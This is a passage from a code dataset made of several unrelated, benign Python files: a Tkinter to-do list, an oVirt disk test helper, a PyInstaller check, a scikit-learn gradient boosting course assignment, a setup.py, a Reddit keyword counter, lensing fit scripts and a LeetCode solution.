tearoff=False)\r\nmy_menu.add_cascade(label=\"Файл\", menu=file_menu)\r\n\r\nfile_menu.add_command(label=\"Сохранить список\", command=save_list)\r\nfile_menu.add_command(label=\"Открыть список\", command=open_list)\r\nfile_menu.add_separator()\r\nfile_menu.add_command(label=\"Очистить список\", command=delete_list)\r\n\r\nadd_button = Button(button_frame, text=\"Добавить\", command=add_item)\r\ndelete_button = Button(button_frame, text=\"Удалить\", command=delete_item)\r\ncross_off_button = Button(button_frame, text=\"Вычеркнуть\", command=cross_off_item)\r\nuncross_button = Button(button_frame, text=\"Отменить\", command=uncross_item)\r\ndelete_crossed_button = Button(button_frame, text=\"Удалить вычеркнутые\", command=delete_crossed)\r\n\r\nadd_button.grid(row=0, column=0)\r\ndelete_button.grid(row=0, column=1, padx=20)\r\ncross_off_button.grid(row=0, column=2)\r\nuncross_button.grid(row=0, column=3, padx=20)\r\ndelete_crossed_button.grid(row=0, column=4)\r\n\r\nroot.mainloop()\r\n","sub_path":"List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"508532088","text":"\"\"\"\nLive Storage Migration test helpers functions\n\"\"\"\nimport config\nfrom art.rhevm_api.tests_lib.low_level import (\n disks as ll_disks,\n)\nfrom rhevmtests.storage.helpers import prepare_disks_for_vm\n\n\ndef add_new_disk_for_test(\n vm_name, alias, provisioned_size=(1 * config.GB), sparse=False,\n disk_format=config.RAW_DISK, wipe_after_delete=False, attach=False,\n sd_name=None\n):\n \"\"\"\n Prepares disk for given vm\n \"\"\"\n disk_params = config.disk_args.copy()\n disk_params['alias'] = alias\n disk_params['active'] = False\n disk_params['provisioned_size'] = provisioned_size\n disk_params['format'] = disk_format\n disk_params['sparse'] = sparse\n disk_params['wipe_after_delete'] = wipe_after_delete\n disk_params['storagedomain'] = sd_name\n\n assert ll_disks.addDisk(True, **disk_params), (\n \"Failed to add disk %s\" % alias\n )\n ll_disks.wait_for_disks_status([alias])\n if attach:\n prepare_disks_for_vm(vm_name, [alias])\n","sub_path":"art/tests/rhevmtests/storage/storage_migration/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"332029452","text":"# coding:utf-8\nimport sys\nimport os\n# https://pythonhosted.org/PyInstaller/runtime-information.html\n\nfrozen = 'not'\nif getattr(sys, 'frozen', False): # we are running in a bundle\n frozen = 'ever so'\n bundle_dir = os.path.dirname(sys.executable)\nelse: # we are running in a normal Python environment\n bundle_dir = os.path.dirname(os.path.abspath(__file__))\nprint('we are', frozen, 'frozen')\nprint('bundle dir is', bundle_dir)\nprint('sys.argv[0] is', sys.argv[0])\nprint('sys.executable is', sys.executable)\nprint('os.getcwd is', os.getcwd())\n","sub_path":"pyToExe/pyinstaller/pyinstaller_test.py","file_name":"pyinstaller_test.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"435097387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 27 19:26:42 2016\n\n@author: Tzyy Shyang\n\"\"\"\n\nimport pprint as pp\n\nimport pandas as pd\nimport numpy as np\n\nimport sklearn as sk\nimport sklearn.ensemble as sken\n\nimport coursera.ml_common.commonlib as cmn\n\n\"\"\"\nExploring Ensemble Methods\n==========================\n\nIn this homework we will explore the use of boosting. For this assignment, we will use the pre-implemented gradient boosted trees. You will:\n\n- Train a boosted ensemble of decision-trees (gradient boosted trees) on the lending club dataset.\n- Predict whether a loan will default along with prediction probabilities (on a validation set).\n- Evaluate the trained model and compare it with a baseline.\n- Find the most positive and negative loans using the learned model.\n- Explore how the number of trees influences classification performance.\n\n\"\"\"\n\n# Load the Lending Club dataset\n# =============================\n\n# We will be using a dataset from the LendingClub.\n\n# 1. Load the dataset into a data frame named loans.\nloans = pd.read_csv('../../data/lending-club-data.csv', index_col='id', dtype={'desc': object}, parse_dates=[47])\n\n# Exploring some features\n\n# 2. Let's quickly explore what the dataset looks like. First, print out the column names to see what features we have in this dataset. \n# Here, we should see that we have some feature columns that have to do with grade of the loan, annual income, home ownership status, etc.\nloans.columns.values\n\n# Modifying the target column\n# ===========================\n\n# The target column (label column) of the dataset that we are interested in is called bad_loans. In this column 1 means a risky (bad) loan 0 means a safe loan.\n\n# In order to make this more intuitive and consistent with the lectures, we reassign the target to be:\n\n# +1 as a safe loan\n# -1 as a risky (bad) loan\n\n# 3. We put this in a new column called safe_loans.\n# safe_loans = 1 => safe\n# safe_loans = -1 => risky\nloans['safe_loans'] = loans['bad_loans'].apply(lambda x: +1 if x==0 else -1)\nloans = loans.drop('bad_loans', 1)\n\n# Selecting features\n# ==================\n\n# In this assignment, we will be using a subset of features (categorical and numeric). The features we will be using are described in the code comments below. \n# If you are a finance geek, the LendingClub website (https://www.lendingclub.com/) has a lot more details about these features.\n\n# 4. The features we will be using are described in the code comments below. Extract these feature columns and target column from the dataset. \n# We will only use these features.\ntarget = 'safe_loans'\nfeatures = ['grade', # grade of the loan (categorical)\n 'sub_grade_num', # sub-grade of the loan as a number from 0 to 1\n 'short_emp', # one year or less of employment\n 'emp_length_num', # number of years of employment\n 'home_ownership', # home_ownership status: own, mortgage or rent\n 'dti', # debt to income ratio\n 'purpose', # the purpose of the loan\n 'payment_inc_ratio', # ratio of the monthly payment to income\n 'delinq_2yrs', # number of delinquincies\n 'delinq_2yrs_zero', # no delinquincies in last 2 years\n 'inq_last_6mths', # number of creditor inquiries in last 6 months\n 'last_delinq_none', # has borrower had a delinquincy\n 'last_major_derog_none', # has borrower had 90 day or worse rating\n 'open_acc', # number of open credit accounts\n 'pub_rec', # number of derogatory public records\n 'pub_rec_zero', # no derogatory public records\n 'revol_util', # percent of available credit being used\n 'total_rec_late_fee', # total late fees received to day\n 'int_rate', # interest rate of the loan\n 'total_rec_int', # interest received to date\n 'annual_inc', # annual income of borrower\n 'funded_amnt', # amount committed to the loan\n 'funded_amnt_inv', # amount committed by investors for the loan\n 'installment', # monthly payment owed by the borrower\n ]\n\n# Skipping observations with missing values\n# =========================================\n\n# Recall from the lectures that one common approach to coping with missing values is to skip observations that contain missing values.\n# In Pandas, we'd run\nloans = loans[[target] + features].dropna()\n\n# Your tool may provide a function to skip observations with missing values. Consult appropriate manuals.\n\n# Fortunately, as you should find, there are not too many missing values. We are retaining most of the data.\n\n# Then follow the following steps:\n\n# - Apply one-hot encoding to loans. Your tool may have a function for one-hot encoding. Alternatively, see #7 for implementation hints.\n# - Load the JSON files into the lists train_idx and validation_idx.\n# - Perform train/validation split using train_idx and validation_idx. In Pandas, for instance:\n\ncommonlib = cmn.MachineLearningCommonLib()\nencoded_loans = commonlib.one_hot_encoding(loans)\n\ntrain_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-train-idx.json')[0].values.tolist()\nvalidation_idx = pd.read_json('../../data/ml-classification-module-8-assignment-1-validation-idx.json')[0].values.tolist()\n\ntrain_data = encoded_loans.iloc[train_idx]\ntrain_target = train_data[target]\ntrain_data = train_data.drop(target, 1)\n\nvalidation_data = encoded_loans.iloc[validation_idx]\n\n# Gradient boosted tree classifier\n# ================================\n\n# Gradient boosted trees are a powerful variant of boosting methods; they have been used to win many Kaggle competitions, and have been widely used in industry. \n# We will explore the predictive power of multiple decision trees as opposed to a single decision tree.\n\n# Additional reading: If you are interested in gradient boosted trees, here is some additional reading material:\n\n# - GraphLab Create user guide (https://turi.com/learn/userguide/supervised-learning/boosted_trees_classifier.html)\n# - Advanced material on boosted trees (http://homes.cs.washington.edu/~tqchen/pdf/BoostedTree.pdf)\n\n# We will now train models to predict safe_loans using the features above. In this section, we will experiment with training an ensemble of 5 trees.\n\n# 9. Now, let's use the built-in scikit learn gradient boosting classifier (sklearn.ensemble.GradientBoostingClassifier) to create a gradient boosted \n# classifier on the training data. You will need to import sklearn, sklearn.ensemble, and numpy.\n\n# You will have to first convert the SFrame into a numpy data matrix. See the API for more information. You will also have to extract the label column. \n# Make sure to set max_depth=6 and n_estimators=5.\ngradient_boosting_classifier = sken.GradientBoostingClassifier(max_depth=6, n_estimators=5) \ngradient_boosting_classifier.fit(train_data, train_target)\n\n# Making predictions\n# ==================\n\n# Just like we did in previous sections, let us consider a few positive and negative examples from the validation set. We will do the following:\n\n# - Predict whether or not a loan is likely to default.\n# - Predict the probability with which the loan is likely to default.\n\n# 10. First, let's grab 2 positive examples and 2 negative examples. \n\nvalidation_safe_loans = validation_data[validation_data[target] == 1]\nvalidation_risky_loans = validation_data[validation_data[target] == -1]\n\nsample_validation_data_risky = validation_risky_loans[0:2]\nsample_validation_data_safe = validation_safe_loans[0:2]\n\nsample_validation_data = sample_validation_data_safe.append(sample_validation_data_risky)\nsample_validation_data = sample_validation_data.drop(target,1)\n\n# 11. For each row in the sample_validation_data, write code to make model_5 predict whether or not the loan is classified as a safe loan. \n# (Hint: if you are using scikit-learn, you can use the .predict() method)\n\nmodel_5 = gradient_boosting_classifier.predict(sample_validation_data)\n\n# Quiz question: What percentage of the predictions on sample_validation_data did model_5 get correct?\n# ans = 75%\n\n# Prediction Probabilities\n# ========================\n\n# 12. For each row in the sample_validation_data, what is the probability (according model_5) of a loan being classified as safe? \n# (Hint: if you are using scikit-learn, you can use the .predict_proba() method)\nmodel_5_prob = gradient_boosting_classifier.predict_proba(sample_validation_data)[:,1]\n\n# Quiz Question: Which loan has the highest probability of being classified as a safe loan?\n# ans = loan 4\n\n# Checkpoint: Can you verify that for all the predictions with probability >= 0.5, the model predicted the label +1?\n\n# Evaluating the model on the validation data\n# ===========================================\n\n# Recall that the accuracy is defined as follows:\n\n# 13. Evaluate the accuracy of the model_5 on the validation_data. (Hint: if you are using scikit-learn, you can use the .score() method)\nvalidation_data_without_target = validation_data.drop(target,1)\nmodel_5_accuracy = gradient_boosting_classifier.score(validation_data_without_target, validation_data[target])\n\n# 14. Calculate the number of false positives made by the model on the validation_data.\nmodel_5_predicted_valid_data = gradient_boosting_classifier.predict(validation_data_without_target)\nfalse_positive_count = 0\nfalse_negative_count = 0\nfor predict, valid in zip(model_5_predicted_valid_data, validation_data[target]):\n if valid == -1 and predict == +1:\n false_positive_count += 1\n if valid == +1 and predict == -1:\n false_negative_count += 1\n\n# Quiz question: What is the number of false positives on the validation_data?\n# ans = 1653\n\n# 15. Calculate the number of false negatives made by the model on the validation_data.\n# ans = 1491\n\n# Comparison with decision trees\n# ==============================\n\n# In the earlier assignment, we saw that the prediction accuracy of the decision trees was around 0.64. In this assignment, \n# we saw that model_5 has an accuracy of approximately 0.67.\n\n# Here, we quantify the benefit of the extra 3% increase in accuracy of model_5 in comparison with a single decision tree from the original \n# decision tree assignment.\n\n# As we explored in the earlier assignment, we calculated the cost of the mistakes made by the model. We again consider the same costs as follows:\n\n# - False negatives: Assume a cost of $10,000 per false negative.\n# - False positives: Assume a cost of $20,000 per false positive.\n\n# Assume that the number of false positives and false negatives for the learned decision tree was\n\n# - False negatives: 1936\n# - False positives: 1503\n\n# Using the costs defined above and the number of false positives and false negatives for the decision tree, we can calculate the total cost of the mistakes made by the \n# decision tree model as follows:\n# cost = $10,000 * 1936 + $20,000 * 1503 = $49,420,000\n\n# The total cost of the mistakes of the model is $49.42M. That is a lot of money!.\n\n# 16. Calculate the cost of mistakes made by model_5 on the validation_data.\ncost = 10000*1491 + 20000*1653\n\n# Quiz Question: Using the same costs of the false positives and false negatives, what is the cost of the mistakes made by the boosted tree model \n# (model_5) as evaluated on the validation_set?\n# ans = 47970000\n\n# Reminder: Compare the cost of the mistakes made by the boosted trees model with the decision tree model. The extra 3% improvement in prediction \n# accuracy can translate to several million dollars! And, it was so easy to get by simply boosting our decision trees.\n\n# Most positive & negative loans\n# ==============================\n\n# In this section, we will find the loans that are most likely to be predicted safe. We can do this in a few steps:\n\n# - Step 1: Use the model_5 (the model with 5 trees) and make probability predictions for all the loans in validation_data.\n# - Step 2: Similar to what we did in the very first assignment, add the probability predictions as a column called predictions into validation_data.\n# - Step 3: Sort the data (in descreasing order) by the probability predictions.\n\n# 17. Start here with Step 1 & Step 2. Make predictions using model_5 for all examples in the validation_data.\nmodel_5_validation_data_prob_prediction = gradient_boosting_classifier.predict_proba(validation_data_without_target)[:,1]\nvalidation_data['predictions'] = model_5_validation_data_prob_prediction\n# Checkpoint: For each row, the probabilities should be a number in the range [0, 1].\n\n# 18. Now, we are ready to go to Step 3. You can now use the prediction column to sort the loans in validation_data (in descending order) by prediction probability. Find the top 5 loans with the highest probability of being predicted as a safe loan.\nvalidation_data = validation_data.sort_values(['predictions'], ascending=[False])\n\n# Quiz question: What grades are the top 5 loans?\n# ans = grade A\n\n# 19. Repeat this exercise to find the 5 loans (in the validation_data) with the lowest probability of being predicted as a safe loan.\nvalidation_data_safe = validation_data[validation_data['predictions'] > 0.5].sort_values(['predictions'], ascending=[True])\n\n# Effects of adding more trees\n# ============================\n\n# In this assignment, we will train 5 different ensemble classifiers in the form of gradient boosted trees.\n\n# 20. Train models with 10, 50, 100, 200, and 500 trees. Use the n_estimators parameter to control the number of trees. Remember to keep max_depth = 6.\n# Call these models model_10, model_50, model_100, model_200, and model_500, respectively. This may take a few minutes to run.\n# Compare accuracy on entire validation set\ngradient_boosting_classifier_10 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=10) \ngradient_boosting_classifier_10.fit(train_data, train_target)\nmodel_10 = gradient_boosting_classifier_10.predict(validation_data_without_target)\n\ngradient_boosting_classifier_50 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=50) \ngradient_boosting_classifier_50.fit(train_data, train_target)\nmodel_50 = gradient_boosting_classifier_50.predict(validation_data_without_target)\n\ngradient_boosting_classifier_100 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=100) \ngradient_boosting_classifier_100.fit(train_data, train_target)\nmodel_100 = gradient_boosting_classifier_100.predict(validation_data_without_target)\n\ngradient_boosting_classifier_200 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=200) \ngradient_boosting_classifier_200.fit(train_data, train_target)\nmodel_200 = gradient_boosting_classifier_200.predict(validation_data_without_target)\n\ngradient_boosting_classifier_500 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=500) \ngradient_boosting_classifier_500.fit(train_data, train_target)\nmodel_500 = gradient_boosting_classifier_500.predict(validation_data_without_target)\n\n# Now we will compare the predicitve accuracy of our models on the validation set.\n\n# 21. Evaluate the accuracy of the 10, 50, 100, 200, and 500 tree models on the validation_data.\nmodel_10_accuracy = gradient_boosting_classifier_10.score(validation_data_without_target, validation_data[target])\nmodel_50_accuracy = gradient_boosting_classifier_50.score(validation_data_without_target, validation_data[target])\nmodel_100_accuracy = gradient_boosting_classifier_100.score(validation_data_without_target, validation_data[target])\nmodel_200_accuracy = gradient_boosting_classifier_200.score(validation_data_without_target, validation_data[target])\nmodel_500_accuracy = gradient_boosting_classifier_500.score(validation_data_without_target, validation_data[target])\n\n# Quiz Question: Which model has the best accuracy on the validation_data?\n# ans = model_5 or model_10\n\n# Quiz Question: Is it always true that the model with the most trees will perform best on test data?\n# ans = False\n\n# Plot the training and validation error vs. number of trees\n# ==========================================================\n\n# Recall from the lecture that the classification error is defined as\n# classification error = 1 - accuracy\n\n# In this section, we will plot the training and validation errors versus the number of trees to get a sense of how these models are performing. \n# We will compare the 10, 50, 100, 200, and 500 tree models. You will need matplotlib in order to visualize the plots.\n\n# 22. First, make sure this block of code runs on your computer.\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef make_figure(dim, title, xlabel, ylabel, legend):\n plt.rcParams['figure.figsize'] = dim\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if legend is not None:\n plt.legend(loc=legend, prop={'size':15})\n plt.rcParams.update({'font.size': 16})\n plt.tight_layout()\n \n# In order to plot the classification errors (on the train_data and validation_data) versus the number of trees, we will need lists of all \n# the errors.\n\n# Steps to follow:\n\n# - Step 1: Calculate the classification error for each model on the training data (train_data).\n# - Step 2: Store the training errors into a list (called training_errors) that looks like this: [train_err_10, train_err_50, ..., train_err_500]\n# - Step 3: Calculate the classification error of each model on the validation data (validation_data).\n# - Step 4: Store the validation classification error into a list (called validation_errors) that looks like this:[validation_err_10, validation_err_50, ..., validation_err_500]\n\n# Once that has been completed, we will give code that should be able to evaluate correctly and generate the plot.\n# 23. Let us start with Step 1. Write code to compute the classification error on the train_data for models model_10, model_50, model_100, \n# model_200, and model_500.\nmodel_10_train_accuracy = gradient_boosting_classifier_10.score(train_data, train_target)\ntrain_err_10 = commonlib.calc_classification_error(model_10_train_accuracy)\n\nmodel_50_train_accuracy = gradient_boosting_classifier_50.score(train_data, train_target)\ntrain_err_50 = commonlib.calc_classification_error(model_50_train_accuracy)\n\nmodel_100_train_accuracy = gradient_boosting_classifier_100.score(train_data, train_target)\ntrain_err_100 = commonlib.calc_classification_error(model_100_train_accuracy)\n\nmodel_200_train_accuracy = gradient_boosting_classifier_200.score(train_data, train_target)\ntrain_err_200 = commonlib.calc_classification_error(model_200_train_accuracy)\n\nmodel_500_train_accuracy = gradient_boosting_classifier_500.score(train_data, train_target)\ntrain_err_500 = commonlib.calc_classification_error(model_500_train_accuracy)\n\n# 24. Now, let us run Step 2. Save the training errors into a list called training_errors.\ntraining_errors = [train_err_10, train_err_50, train_err_100, train_err_200, train_err_500]\n\n# 27. Now, we will plot the training_errors and validation_errors versus the number of trees. We will compare the 10, 50, 100, 200, \n# and 500 tree models. We provide some plotting code to visualize the plots within this notebook.\n\nvalid_err_10 = commonlib.calc_classification_error(model_10_accuracy)\nvalid_err_50 = commonlib.calc_classification_error(model_50_accuracy)\nvalid_err_100 = commonlib.calc_classification_error(model_100_accuracy)\nvalid_err_200 = commonlib.calc_classification_error(model_200_accuracy)\nvalid_err_500 = commonlib.calc_classification_error(model_500_accuracy)\n\nvalidation_errors = [valid_err_10, valid_err_50, valid_err_100, valid_err_200, valid_err_500]\n\n# 28. Run the following code to visualize the plots.\nplt.plot([10, 50, 100, 200, 500], training_errors, linewidth=4.0, label='Training error')\nplt.plot([10, 50, 100, 200, 500], validation_errors, linewidth=4.0, label='Validation error')\n\nmake_figure(dim=(10,5), \n title='Error vs number of trees',\n xlabel='Number of trees',\n ylabel='Classification error',\n legend='best')\n \n# Quiz question: Does the training error reduce as the number of trees increases?\n# ans = True\n\n# Quiz question: Is it always true that the validation error will reduce as the number of trees increases?\n# ans = False","sub_path":"python/coursera/ml_classification/week5/assignment1-exploring_ensemble_methods.py","file_name":"assignment1-exploring_ensemble_methods.py","file_ext":"py","file_size_in_byte":20476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"536336000","text":"#!/usr/bin/env python3\nimport os\nfrom setuptools import setup, find_packages\nfrom jsonrpc import version\n\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return \"\"\n\nsetup(\n name=\"json-rpc-3\",\n version=version,\n packages=find_packages(),\n test_suite=\"nose.collector\",\n tests_require=[\"nose\", \"mock\"],\n author='see AUTHORS',\n maintainer='Orhideous',\n maintainer_email='orhideous@gmail.com',\n url=\"https://github.com/Orhideous/json-rpc\",\n description=\"Pure Python 3 JSON-RPC 2.0 transport realisation\",\n long_description=read('README.rst'),\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.2\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords=[\"json\", \"rpc\", \"json-rpc\", \"transport\"],\n license=\"MIT\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"246203136","text":"from optparse import OptionParser\n\nimport numpy as np\nimport pandas as pd\n\nfrom ..util import file_handling as fh\n\ndef main():\n usage = \"%prog predictions_file.csv cfm_file.json output_filename.csv n_labels\"\n parser = OptionParser(usage=usage)\n #parser.add_option('--keyword', dest='key', default=None,\n # help='Keyword argument: default=%default')\n #parser.add_option('--boolarg', action=\"store_true\", dest=\"boolarg\", default=False,\n # help='Keyword argument: default=%default')\n\n (options, args) = parser.parse_args()\n\n predictions_file = args[0]\n cfm_file = args[1]\n output_filename = args[2]\n n_labels = int(args[3])\n\n predictions_df = pd.read_csv(predictions_file, header=0, index_col=0)\n cfm_json = fh.read_json(cfm_file)\n cfm = np.array(cfm_json['confusion_matrix'])\n\n predictions = list(predictions_df['prediction'].as_matrix().tolist())\n\n n_items = len(predictions)\n\n corrected = np.zeros([n_items, n_labels])\n\n for i, p in enumerate(predictions):\n corrected[i, :] = cfm[p, :]\n\n for n in range(n_labels):\n predictions_df[str(n)] = corrected[:, n]\n\n predictions_df.to_csv(output_filename)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"core/postprocessing/apply_correction.py","file_name":"apply_correction.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129044313","text":"from typing import List\n\n\nclass Solution:\n def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]:\n \"\"\"\n Given an array of strings `products` and a string `searchWord`. We want to design a system that suggests at most three product names from `products` after each character of `searchWord` is typed. Suggested products should have common prefix with the searchWord. If there are more than three products with a common prefix return the three lexicographically minimums products.\n\n Return *list of lists* of the suggested `products` after each character of `searchWord` is typed.\n\n\n **Example 1:**\n\n ```\n Input: products = [\"mobile\",\"mouse\",\"moneypot\",\"monitor\",\"mousepad\"], searchWord = \"mouse\"\n Output: [\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"]\n ]\n Explanation: products sorted lexicographically = [\"mobile\",\"moneypot\",\"monitor\",\"mouse\",\"mousepad\"]\n After typing m and mo all products match and we show user [\"mobile\",\"moneypot\",\"monitor\"]\n After typing mou, mous and mouse the system suggests [\"mouse\",\"mousepad\"]\n ```\n\n **Example 2:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"havana\"\n Output: [[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"]]\n ```\n\n **Example 3:**\n\n ```\n Input: products = [\"bags\",\"baggage\",\"banner\",\"box\",\"cloths\"], searchWord = \"bags\"\n Output: [[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\"],[\"bags\"]]\n ```\n\n **Example 4:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"tatiana\"\n Output: [[],[],[],[],[],[],[]]\n ```\n\n\n\n **Constraints:**\n\n - `1 <= products.length <= 1000`\n - There are no repeated elements in `products`.\n - `1 <= Σ products[i].length <= 2 * 10^4`\n - All characters of `products[i]` are lower-case English letters.\n - `1 <= searchWord.length <= 1000`\n - All characters of `searchWord` are lower-case English letters.\n\n\n Parameters\n ----------\n products: List[str]\n searchWord: str\n\n Returns\n -------\n int\n\n Examples\n --------\n\n Notes\n -----\n\n References\n ---------\n\n \"\"\"\n from bisect import bisect_left\n i, res, prefix = 0, [], ''\n products.sort()\n for ch in searchWord:\n prefix = prefix + ch\n i = bisect_left(products, prefix, i)\n res.append([w for w in products[i:i+3] if w.startswith(prefix)])\n return res\n\n def suggestedProducts01(self, products: List[str], searchWord: str) -> List[List[str]]:\n from collections import defaultdict\n\n class Trie:\n def __init__(self):\n self.sub = defaultdict(Trie)\n self.suggestions = []\n\n def add_suggestions(self, word):\n if len(self.suggestions) < 3:\n self.suggestions.append(word)\n\n products = sorted(products)\n root = Trie()\n for word in products:\n node = root\n for ch in word:\n node = node.sub[ch]\n node.add_suggestions(word)\n\n res, node = [], root\n for ch in searchWord:\n node = node.sub[ch]\n res.append(node.suggestions)\n\n return res\n\n\n\n","sub_path":"01268/search_suggestions_system.py","file_name":"search_suggestions_system.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"449882717","text":"#!/usr/bin/env python\n#######################\n# Run a ML pdz fit for an nfw model\n########################\n\nimport numpy as np\nimport sys, ldac, astropy, astropy.io.fits as pyfits, cPickle\nimport shearprofile as sp\nimport nfwmodel\n\n\n\n##########################\n\ninputCatFile = sys.argv[1]\ninputPDZ = sys.argv[2]\nshapedistro_module = sys.argv[3]\noutputFile = sys.argv[4]\n\n##########################\n\ninputcat = ldac.openObjectFile(inputCatFile)\n\nconcentration = inputcat.hdu.header['CONCEN']\nzcluster = inputcat.hdu.header['Z']\n\n\nD_lens = sp.angulardist(zcluster)\npixscale = 0.2\nminPix = 0.3 * 3600. * (180./np.pi) / ( pixscale * D_lens )\nmaxPix = 5. * 3600. * (180./np.pi) / ( pixscale * D_lens )\n\ngoodObjs = np.logical_and(np.logical_and(inputcat['r_pix'] > minPix, \n inputcat['r_pix'] < maxPix),\n np.logical_and(inputcat['z_b'] > 0,\n inputcat['z_b'] < 1.25))\n\n\nshapedistro = __import__(shapedistro_module)\n\nbin_selectors = [np.logical_and(goodObjs, selector) \\\n for selector in shapedistro.bin_selectors(inputcat)]\n\n\npdzfile = open(inputPDZ, 'rb')\npdzrange, pdz = cPickle.load(pdzfile)\npdzrange = pdzrange.astype(np.float64)\npdz = pdz.astype(np.float64)\n\n\nbetas = sp.beta_s(pdzrange, zcluster)\n\nrs = np.arange(0.01, 1.0, 0.0005)\n\nrs, scan = nfwmodel.scan_model(rs, \n [inputcat['r_mpc'][x].astype(np.float64) for x in bin_selectors],\n [inputcat['ghats'][x].astype(np.float64) for x in bin_selectors],\n betas,\n [pdz[x] for x in bin_selectors],\n concentration,\n zcluster,\n shapedistro.likelihood_func,\n shapedistro.samples)\n\n\n\n\ncols = [ pyfits.Column(name = 'Rs', format = 'E', array = rs),\n pyfits.Column(name = 'prob', format = 'E', array = scan)]\ncat = pyfits.BinTableHDU.from_columns(cols)\ncat.header['EXTNAME']= 'OBJECTS'\n\ncat.writeto(outputFile, overwrite=True)\n","sub_path":"nfwmodel_binned_batchrunner.py","file_name":"nfwmodel_binned_batchrunner.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"243504672","text":"#!/usr/bin/python3\n\"\"\"\nDefines recursive function to query the Reddit API,\nparse titles of all hot articles, and print sorted count\n\"\"\"\n\n\ndef count_words(subreddit, word_list, after=None, count={}):\n \"\"\"\n Queries the Reddit API, parses titles of all hot articles,\n and prints sorted count\n\n parameters:\n subreddit: subreddit to query for hot articles\n word_list: list of keywords to count\n after: indicates next starting point to get data after\n count: dictionary of current count of keyword\n \"\"\"\n import json\n import requests\n if after is None:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)\n else:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit, after)\n subreddit_info = requests.get(sub_URL,\n headers={\"user-agent\": \"user\"},\n allow_redirects=False)\n for word in word_list:\n word = word.lower()\n if word not in count.keys():\n count[word] = 0\n try:\n data = subreddit_info.json().get(\"data\")\n except:\n return\n children = data.get(\"children\")\n for child in children:\n title = (child.get(\"data\").get(\"title\").lower())\n title = title.split(' ')\n for word in word_list:\n word = word.lower()\n count[word] += title.count(word)\n after = data.get(\"after\")\n if after is not None:\n return count_words(subreddit, word_list, after, count)\n result = []\n for k in count.keys():\n if count[k] != 0:\n if result == []:\n result.append(\"{}: {}\".format(k, count[k]))\n else:\n for i in range(len(result)):\n if count[k] > int(result[i].split(' ')[1]):\n result = result[:i] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i:]\n break\n elif count[k] == int(result[i].split(' ')[1]):\n alpha_list = [k, result[i].split(' ')[0]]\n j = 1\n if (i + j) >= len(result):\n continue\n while count[k] == int(result[i + j].split(' ')[1]):\n alpha_list.append(result[i + j].split(' ')[0])\n alpha_list = alpha_list.sort\n for j in range(len(alpha_list)):\n if k == alpha_list[j]:\n result = result[:i + j] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i + j:]\n else:\n continue\n else:\n result.append(\"{}: {}\".format(k, count[k]))\n if result != []:\n for printing in result:\n print(printing)\n","sub_path":"0x13-count_it/0-count.py","file_name":"0-count.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"442221471","text":"from typing import List, Dict\n\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Analyzers.GlobalDifferentialAnalyzerBase import \\\n GlobalDifferentialAnalyzerBase\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Measurers.GlobalRsemNormalizedCountMeasurer import \\\n GlobalRsemNormalizedCountMeasurer\nfrom Src.BioAnalyzer.CrossCutting.DTOs.GenePrioritization.GlobalDifferentialSampleDto import GlobalDifferentialSampleDto\nfrom Src.BioAnalyzer.Managers.GenePrioritization.GlobalDifferentialMessengerRnaSampleManager import \\\n GlobalDifferentialMessengerRnaSampleManager\nfrom Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto import GeneExpressionLevelDto\nfrom Src.Core.Entity.ProcessInfo import 